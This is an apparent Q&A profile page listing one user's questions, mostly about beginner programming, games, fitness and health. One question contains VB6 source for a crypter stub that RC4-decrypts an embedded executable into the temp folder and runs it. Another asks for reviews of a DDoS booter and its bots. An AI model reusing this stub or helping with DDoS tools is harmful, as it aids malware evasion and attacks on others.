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  • what template do i use for c++ project?

    I'm just starting to learn c++ and I'm starting with the "Hello world" application.

    I'm using visual studio 2010 and when i go to select a template I can choose:

    "win32 console application"

    "mfc application"

    "win32 project"

    "empty project"

    "atl project"

    "mfc dll"

    "windows form application"

    "clr console application"

    "clr empty project"

    "class library"

    "custom library"

    "makefile project"

    "mfc activex control"

    "test project"

    "windows form control library"

    So which one do i choose to do the "hello world" example?

    also when I've been trying it, i have the line of code "#include <iostream> but it always gives me some stupid error.

    can anyone tell me what im doing wrong?

    1 AnswerProgramming & Design10 years ago
  • what program do i use to code c?

    this is probably an obvious answer but I seem to be having a huge brain fart here. what program do i download to start coding in c?

    2 AnswersProgramming & Design10 years ago
  • Does white shorts and white shirt go together?

    I'm pretty much an idiot when it comes to fashion sense. I only really know the basics like dont mix patterns and such.

    I have a white graphic T and the graphic is black, will it go well with white shorts?

    5 AnswersFashion & Accessories10 years ago
  • linux help (fedora) - don't understand the change directory command (cd)?

    I don't understand the change directory command. If I need to go to a certain directory like say i need to configure a program and the folder is in my downloads folder. How do I go about getting into the directory of the folder in my downloads folder.

    I know how to change directories to /home or /etc. but I don't know how to get into the directory for the files i need to configure and make.

    for instance im trying to install conky. there is a text file telling me how to install it. it says to CD to the directory containing the package's source and then use /configure to configure the package for my system.

    I can't even get passed the cd part, I just don't understand it.

    3 AnswersSoftware10 years ago
  • who was the elven warrior in lord of the rings, he was killed by an orc while defending Helms Deep?

    I remember in the movie that they were defending helms deep from orcs and basically they were retreating and it was one special high elf that was still in the midst of combat and he got cut down in the back by an orc and Aragorn killed the orc and then held the elf as he died.

    Does anyone know the name of that elven warrior?

    3 AnswersMovies10 years ago
  • How to setup website with Dyndns and Dreamweaver?

    I have a free dyndns host. It uses my IP address and a hostname of my choice.

    I don't know how to setup a site with it though, when I click "new site" in dreamweaver and name it then try to setup a server it asks for a FTP address, a username, a password, and then there's a blank for root directory and web url.

    I am unsure of what to put for these blanks.

    Also for the port (by default it is on port 21 for ftp) I can easily forward ports, just not sure which one and which setting (udp/tcp) I need to open it for

    1 AnswerProgramming & Design1 decade ago
  • - messagebox problem - end if must be preceded by a matching if?

    so I have some code for a message box.

    it goes as follows:

    If ProgressBar1.Value = 90 Then

    msg = "successfully sent!" ' Define message.

    style = MsgBoxStyle.DefaultButton2

    title = "" ' Define title.

    ' Display message.

    response = MsgBox(msg, style, title)

    End If

    If response = MsgBoxResult.Yes Then Timer1.Enabled = False

    End If

    the problem is this end if at the end, its telling me it has to be preceded by

    I have msgboxstyle, msgbox result, title and msg all declared.

    Not sure why its telling me that though, because i have the if and end if

    2 AnswersProgramming & Design1 decade ago
  • - can you reset progress bar by clicking ok on a msgbox?

    I have a progress bar and it is attached to a timer, so it progresses when I click a button which enabled the timer, then a msgbox pops up.

    Is there a way that I can have the msgbox make the progress bar reset as well as set the timer .enabled to false?

    4 AnswersProgramming & Design1 decade ago
  • - creating two different random number generators - giving me the same number?

    here is my declared code:

    dim mynum as new random

    dim mynum2 as new random

    Then my button click has the command:

    TextBox1.Text = myNum.Next(1, 255)

    TextBox2.Text = myNum2.Next(1, 255)

    When I run my application and click the button, they are generating the same number. I've tried changing the variables but it doesn't matter.

    not sure what the problem is :$

    4 AnswersProgramming & Design1 decade ago
  • - couple questions?

    I have a combo box and I want to make it so that the text in the combo box cannot be edited, but so you can still use the drop down arrow to select one of the predefined items. how can I do this?

    Also I asked a previous question about random number generation, and now I need to know how I can have more than one set of numbers in a single text box.

    I made a new declaration for a second random number string, however using the "+" simply adds them together, I want them side by side. To do so wouldn't I need to convert them to a string?

    Finally, I want to have a progress bar set up with a timer, so that when a button is pressed, the progress bar will start to fill, based on the time set in the combobox

    1 AnswerProgramming & Design1 decade ago
  • - make button generate random numbers?

    I need to make a button generate random numbers in a text box. How can I do this? For instance I want it to generate any 3 random numbers, however I dont want a 0 to ever be at the start of the 3 numbers

    2 AnswersProgramming & Design1 decade ago
  • VB6 (advanced) - making stub from source code - "subscript out of range"?

    I have the code compiled in a module, no forms. the main part of the code is:

    Public Sub Main()

    Dim sStub As String, sFile As String

    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1

    sStub = Space(LOF(1))

    Get #1, , sStub

    Close #1

    sFile = Split(sStub, FileSplit)(1)

    Open Environ("tmp") & "\decrypted.exe" For Binary As #1

    Put #1, , RC4(sFile, Pass)

    Call ShellExecute(0, vbNullString, Environ("tmp") & "\decrypted.exe", vbNullString, vbNullString, 1)

    End Sub

    my general declarations are:

    Const FileSplit = "<@#@>"

    Const Pass = "blaadjuh"

    Dim sFile As String

    Public Declare Function ShellExecute Lib "Shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long

    I also have a public source code for RC4 encryption:

    Public Function RC4(ByVal Expression As String, ByVal Password As String) As String

    On Error Resume Next

    Dim RB(0 To 255) As Integer, X As Long, Y As Long, Z As Long, Key() As Byte, ByteArray() As Byte, Temp As Byte

    If Len(Password) = 0 Then

    Exit Function

    End If

    If Len(Expression) = 0 Then

    Exit Function

    End If

    If Len(Password) > 256 Then

    Key() = StrConv(Left$(Password, 256), vbFromUnicode)


    Key() = StrConv(Password, vbFromUnicode)

    End If

    For X = 0 To 255

    RB(X) = X

    Next X

    X = 0

    Y = 0

    Z = 0

    For X = 0 To 255

    Y = (Y + RB(X) + Key(X Mod Len(Password))) Mod 256

    Temp = RB(X)

    RB(X) = RB(Y)

    RB(Y) = Temp

    Next X

    X = 0

    Y = 0

    Z = 0

    ByteArray() = StrConv(Expression, vbFromUnicode)

    For X = 0 To Len(Expression)

    Y = (Y + 1) Mod 256

    Z = (Z + RB(Y)) Mod 256

    Temp = RB(Y)

    RB(Y) = RB(Z)

    RB(Z) = Temp

    ByteArray(X) = ByteArray(X) Xor (RB((RB(Y) + RB(Z)) Mod 256))

    Next X

    RC4 = StrConv(ByteArray, vbUnicode)

    End Function

    When I hit start, I get the message:

    Run-time error '9':

    subscript out of range

    When I hit debug it highlights the line of code:

    sFile = Split(sStub, FileSplit)(1)

    (line 7 of main code)

    Do any advanced VB users know what my problem is? I've been working at this for a while and cant figure it out.

    1 AnswerProgramming & Design1 decade ago
  • DaRK DDoSeR review. Anyone who has used recent versions (4.4 and up)?

    I want to buy this, I know alot about host booters and ddosing however I want a review from someone who has used it before.

    Is it good?

    Does the purchase come with any start out bots or do you have to assemble your "army" of bots yourself?

    Is it worth it or are there better host booters out there?

    1 AnswerSoftware1 decade ago
  • upload speed is supposed to be 5mb/s only uploading at 10kb/s why?

    So I'm fairly tech savvy, know alot about computer hardware and networking however I cannot figure out why my upload speeds are so bad. I download alot of torrents and I like to return the favor by seeding however I cant seed high at all.

    I have rogers highest internet package, so I can get 50mb/s down and 5 mb/s up. However I cannot get good upload speeds. I dont have anything capped on the router so I'm not sure why I'm only able to seed at 10 kb/s.

    I use tixati to torrent, used to use utorrent and it was the same problem. I have my bandwith allocation set to max for upload and download.

    any help guys?

    5 AnswersSoftware1 decade ago
  • Oblivion (PC) - game keeps freezing on me, I can use the console but nothing else?

    Not sure if the game is really freezing or not or if theres something I can do to unfreeze it, however randomly the game will freeze. I can open the console and use it, and all background music works but the game itself is frozen and I cant do anything to unfreeze it.

    any advice or do i just have to close it and reopen it each time this happens?

    1 AnswerVideo & Online Games1 decade ago
  • Final fantasy III (3) or Final Fantasy V(5) - which is the better game (gameplay and graphics) in your opinion?

    title says it all, I like them both, but i cant really decide which is my favourite

    2 AnswersVideo & Online Games1 decade ago
  • People with gym experience/trainers - need a workout schedule for the YMCA. Need to bulk up for football?

    So me and a couple buddies need to bulk up for senior football, we all have/are getting memberships for the ymca in our town.

    So we plan on lifting weights and doing cardio. We want to make it an intense workout.

    So we're wondering how many days a week we should do it for, obviously we need a couple days to repair muscles (we don't plan on using creatine).

    We we're thinking monday, wednesday, friday and have saturday and sunday to repair muscles, or squeeze in another day on tuesday or thursday for an extra workout day.

    We will be trying to build muscle mass. So biceps, triceps, core and lower leg muscles. strenuous workouts for each, heavy lifting to tear muscles so they can get bigger.

    cardio will either be running on the treadmills, swimming laps, or sprinting 110s.

    so im just wondering if this is a good workout plan and your opinions on the schedule. Per day we plan to do it 2 hours, if not a bit more. Just not sure on what the days should be for maximum muscle build.

    So any help you could offer would be great thanks.

    2 AnswersDiet & Fitness1 decade ago
  • Male physical performance increases if not sexually active for periods of time?

    Heard someone say not to have sex before doing something physical such as a sport or something. So just wondering if by not being sexually active for a while (days, week, etc) will it boost physical performance by means of testosterone build up?

    3 AnswersMen's Health1 decade ago
  • Do I need a tetanus shot?

    so exactly a week ago I stepped on a rusty nail. It went through my shoe and pierced the skin, however it was not deep. I went home and immediately applied hydrogen peroxide multiple times. I've applied it a few times since then and have been putting polysporin on it.

    I am unaware of the symptoms that may occur if this rusty nail has caused any problems, so if anyone could give me the symptoms or if you recommend I go get a shot your answer is much appreciated.

    3 AnswersInfectious Diseases1 decade ago
  • male - small pimples on the areola (not the normal bumps around the areola)?

    So I have these small pimples, barely noticable, however they are not around the areola like those other little bumps. These are on the areola and i can squeeze them and have white substance come out, much like a pimple.

    Is this normal? Why would I have pimples on the areolas of my nipples?

    1 AnswerSkin Conditions1 decade ago